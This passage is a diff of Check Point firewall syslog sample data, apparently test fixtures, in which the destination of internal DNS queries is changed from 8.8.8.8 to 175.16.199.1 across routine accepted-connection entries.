service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T16:57:17Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36d,0x4,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"11"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"81.171.33.202"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"39534"; service:"80"; service_id:"http"; src:"192.168.2.2"] -<134>1 2020-03-29T16:57:17Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36d,0x5,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"12"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501037"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"51615"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:57:17Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36d,0x6,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"13"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501037"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"48425"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:57:17Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36d,0x7,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"14"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501037"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"35459"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:57:17Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36d,0x5,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"12"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501037"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"51615"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:57:17Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36d,0x6,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"13"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501037"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"48425"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:57:17Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36d,0x7,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"14"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501037"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"35459"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T16:57:17Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36d,0x2,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"15"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"81.171.33.202"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"33972"; service:"443"; service_id:"https"; src:"192.168.2.2"] <134>1 2020-03-29T16:57:18Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d36e,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.255"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"138"; service:"138"; service_id:"nbdatagram"; src:"192.168.1.196"] -<134>1 2020-03-29T16:57:18Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36e,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501038"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45724"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:57:18Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36e,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501038"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47374"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:57:18Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36e,0x1,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501038"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50265"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:57:18Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36e,0x1,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501038"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59575"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:57:18Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36e,0x1,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501038"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50747"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:57:18Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36e,0x2,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501038"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43931"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:57:18Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36e,0x2,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501038"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"42662"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:57:18Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36e,0x3,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"9"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501038"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38182"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:57:20Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d370,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501040"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"35224"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:57:20Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d370,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501040"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"41291"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:57:20Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d370,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501040"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56079"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:57:20Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d370,0x1,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501040"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36181"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:57:20Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d370,0x2,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501040"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44038"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:57:20Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d370,0x3,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501040"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40103"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:57:20Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d370,0x4,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501040"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"51391"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:57:20Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d370,0x5,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501040"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57541"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:57:20Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d370,0x1,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"9"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501040"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36012"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:57:20Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d370,0x2,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"10"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501040"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"39094"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:57:20Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d370,0x1,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"11"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501040"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"48363"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:57:18Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36e,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501038"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45724"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:57:18Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36e,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501038"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47374"; service:"53"; 
